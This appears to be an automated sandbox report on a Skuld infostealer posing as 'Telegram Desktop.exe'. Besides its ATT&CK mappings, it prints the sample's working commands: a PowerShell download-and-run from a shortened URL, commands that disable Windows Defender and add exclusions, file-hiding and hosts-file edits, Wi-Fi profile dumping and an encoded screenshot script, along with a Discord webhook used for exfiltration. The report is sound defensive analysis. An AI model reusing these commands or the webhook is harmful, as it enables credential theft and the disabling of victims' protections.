skuld | 6bf297bef2431e24bbbbca085f5774593ae2bce6ada433d59259c5608ad37dcb

Analysis

max time kernel
17s
max time network
18s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
21-07-2024 14:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Telegram Desktop.exe
Size

310KB
MD5

d284f1ffcf65941c59498f41de410168
SHA1

404ec1fca6c6b442e2751d90cdf5cadd76395076
SHA256

6bf297bef2431e24bbbbca085f5774593ae2bce6ada433d59259c5608ad37dcb
SHA512

c25381a6b43b06905ab735f8bf21cae045d010c557f936a0aed3e173080f33d1a2eac17a4b129f972e3a4da674ff37c6c0c35c1dd28ac91ffbcd99d8ae4d8d47
SSDEEP

6144:z8JsLcpjzTDDmHayakLkrb4NSarQW82X+t40XIQ:IzxzTDWikLSb4NS7t2X+t40XIQ

Score

10^/10

skuld execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://tinyurl.com/mmtffwh6

Extracted

Family

skuld

https://discord.com/api/webhooks/1264554977548959744/oC53YCw85zYhcirGtr-tguubwfkNi6K13nKw05hZvFcoP9Rq_6cKfDH030-fMLXLn3RB

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld

Blocklisted process makes network request 2 IoCs

flow	pid	Process
25	5056	powershell.exe
29	5056	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1932	powershell.exe
5056	powershell.exe
1096	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	file.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	Telegram Desktop.exe

Executes dropped EXE 1 IoCs

pid	Process
1964	file.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	file.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
34	discord.com
35	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
38	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2908	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5008	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	39	Go-http-client/1.1

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 5c00000001000000040000000008000019000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	file.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
5056	powershell.exe
5056	powershell.exe
1964	file.exe
1964	file.exe
1964	file.exe
1964	file.exe
1932	powershell.exe
1932	powershell.exe
1964	file.exe
1964	file.exe
1932	powershell.exe
1492	powershell.exe
1492	powershell.exe
1492	powershell.exe
1096	powershell.exe
1096	powershell.exe
1096	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	1964	file.exe
Token: SeIncreaseQuotaPrivilege	3616	wmic.exe
Token: SeSecurityPrivilege	3616	wmic.exe
Token: SeTakeOwnershipPrivilege	3616	wmic.exe
Token: SeLoadDriverPrivilege	3616	wmic.exe
Token: SeSystemProfilePrivilege	3616	wmic.exe
Token: SeSystemtimePrivilege	3616	wmic.exe
Token: SeProfSingleProcessPrivilege	3616	wmic.exe
Token: SeIncBasePriorityPrivilege	3616	wmic.exe
Token: SeCreatePagefilePrivilege	3616	wmic.exe
Token: SeBackupPrivilege	3616	wmic.exe
Token: SeRestorePrivilege	3616	wmic.exe
Token: SeShutdownPrivilege	3616	wmic.exe
Token: SeDebugPrivilege	3616	wmic.exe
Token: SeSystemEnvironmentPrivilege	3616	wmic.exe
Token: SeRemoteShutdownPrivilege	3616	wmic.exe
Token: SeUndockPrivilege	3616	wmic.exe
Token: SeManageVolumePrivilege	3616	wmic.exe
Token: 33	3616	wmic.exe
Token: 34	3616	wmic.exe
Token: 35	3616	wmic.exe
Token: 36	3616	wmic.exe
Token: SeIncreaseQuotaPrivilege	3616	wmic.exe
Token: SeSecurityPrivilege	3616	wmic.exe
Token: SeTakeOwnershipPrivilege	3616	wmic.exe
Token: SeLoadDriverPrivilege	3616	wmic.exe
Token: SeSystemProfilePrivilege	3616	wmic.exe
Token: SeSystemtimePrivilege	3616	wmic.exe
Token: SeProfSingleProcessPrivilege	3616	wmic.exe
Token: SeIncBasePriorityPrivilege	3616	wmic.exe
Token: SeCreatePagefilePrivilege	3616	wmic.exe
Token: SeBackupPrivilege	3616	wmic.exe
Token: SeRestorePrivilege	3616	wmic.exe
Token: SeShutdownPrivilege	3616	wmic.exe
Token: SeDebugPrivilege	3616	wmic.exe
Token: SeSystemEnvironmentPrivilege	3616	wmic.exe
Token: SeRemoteShutdownPrivilege	3616	wmic.exe
Token: SeUndockPrivilege	3616	wmic.exe
Token: SeManageVolumePrivilege	3616	wmic.exe
Token: 33	3616	wmic.exe
Token: 34	3616	wmic.exe
Token: 35	3616	wmic.exe
Token: 36	3616	wmic.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeIncreaseQuotaPrivilege	2484	wmic.exe
Token: SeSecurityPrivilege	2484	wmic.exe
Token: SeTakeOwnershipPrivilege	2484	wmic.exe
Token: SeLoadDriverPrivilege	2484	wmic.exe
Token: SeSystemProfilePrivilege	2484	wmic.exe
Token: SeSystemtimePrivilege	2484	wmic.exe
Token: SeProfSingleProcessPrivilege	2484	wmic.exe
Token: SeIncBasePriorityPrivilege	2484	wmic.exe
Token: SeCreatePagefilePrivilege	2484	wmic.exe
Token: SeBackupPrivilege	2484	wmic.exe
Token: SeRestorePrivilege	2484	wmic.exe
Token: SeShutdownPrivilege	2484	wmic.exe
Token: SeDebugPrivilege	2484	wmic.exe
Token: SeSystemEnvironmentPrivilege	2484	wmic.exe
Token: SeRemoteShutdownPrivilege	2484	wmic.exe
Token: SeUndockPrivilege	2484	wmic.exe
Token: SeManageVolumePrivilege	2484	wmic.exe
Token: 33	2484	wmic.exe
Token: 34	2484	wmic.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 536 wrote to memory of 2496	536	Telegram Desktop.exe	85
PID 536 wrote to memory of 2496	536	Telegram Desktop.exe	85
PID 536 wrote to memory of 2496	536	Telegram Desktop.exe	85
PID 2496 wrote to memory of 1072	2496	cmd.exe	89
PID 2496 wrote to memory of 1072	2496	cmd.exe	89
PID 2496 wrote to memory of 1072	2496	cmd.exe	89
PID 1072 wrote to memory of 5056	1072	cmd.exe	92
PID 1072 wrote to memory of 5056	1072	cmd.exe	92
PID 1072 wrote to memory of 5056	1072	cmd.exe	92
PID 1072 wrote to memory of 2908	1072	cmd.exe	99
PID 1072 wrote to memory of 2908	1072	cmd.exe	99
PID 1072 wrote to memory of 2908	1072	cmd.exe	99
PID 1072 wrote to memory of 1964	1072	cmd.exe	100
PID 1072 wrote to memory of 1964	1072	cmd.exe	100
PID 1964 wrote to memory of 4612	1964	file.exe	103
PID 1964 wrote to memory of 4612	1964	file.exe	103
PID 1964 wrote to memory of 3616	1964	file.exe	104
PID 1964 wrote to memory of 3616	1964	file.exe	104
PID 1964 wrote to memory of 1932	1964	file.exe	105
PID 1964 wrote to memory of 1932	1964	file.exe	105
PID 1964 wrote to memory of 2436	1964	file.exe	106
PID 1964 wrote to memory of 2436	1964	file.exe	106
PID 1964 wrote to memory of 2484	1964	file.exe	107
PID 1964 wrote to memory of 2484	1964	file.exe	107
PID 1964 wrote to memory of 5008	1964	file.exe	108
PID 1964 wrote to memory of 5008	1964	file.exe	108
PID 1964 wrote to memory of 3040	1964	file.exe	109
PID 1964 wrote to memory of 3040	1964	file.exe	109
PID 1964 wrote to memory of 1492	1964	file.exe	110
PID 1964 wrote to memory of 1492	1964	file.exe	110
PID 1964 wrote to memory of 868	1964	file.exe	111
PID 1964 wrote to memory of 868	1964	file.exe	111
PID 1964 wrote to memory of 2664	1964	file.exe	112
PID 1964 wrote to memory of 2664	1964	file.exe	112
PID 1964 wrote to memory of 3620	1964	file.exe	113
PID 1964 wrote to memory of 3620	1964	file.exe	113
PID 1964 wrote to memory of 1096	1964	file.exe	114
PID 1964 wrote to memory of 1096	1964	file.exe	114
PID 1096 wrote to memory of 2268	1096	powershell.exe	116
PID 1096 wrote to memory of 2268	1096	powershell.exe	116
PID 2268 wrote to memory of 4536	2268	csc.exe	117
PID 2268 wrote to memory of 4536	2268	csc.exe	117

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4612	attrib.exe
2436	attrib.exe
868	attrib.exe
2664	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Telegram Desktop.exe
"C:\Users\Admin\AppData\Local\Temp\Telegram Desktop.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:536
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\helper (2) - Copy.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K rattesting.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1072
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$webClient = New-Object System.Net.WebClient; try { $webClient.DownloadFile('https://tinyurl.com/mmtffwh6', 'file.exe') } catch { Write-Host 'Error downloading file:' $_.Exception.Message; exit 1 }"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5056
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 3
      4⤵
      Delays execution with timeout.exe
      PID:2908
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Adds Run key to start application
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1964
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
        5⤵
        Views/modifies file attributes
        
        PID:4612
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get Caption
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3616
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1932
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
        5⤵
        Views/modifies file attributes
        
        PID:2436
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic cpu get Name
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2484
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5008
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        5⤵
        
        PID:3040
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1492
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:868
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:2664
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3620
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1096
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1rxx5eo5\1rxx5eo5.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2268
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD74.tmp" "c:\Users\Admin\AppData\Local\Temp\1rxx5eo5\CSC897107FB8BBA428A907C968592F8B339.TMP"
        7⤵
        
        PID:4536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

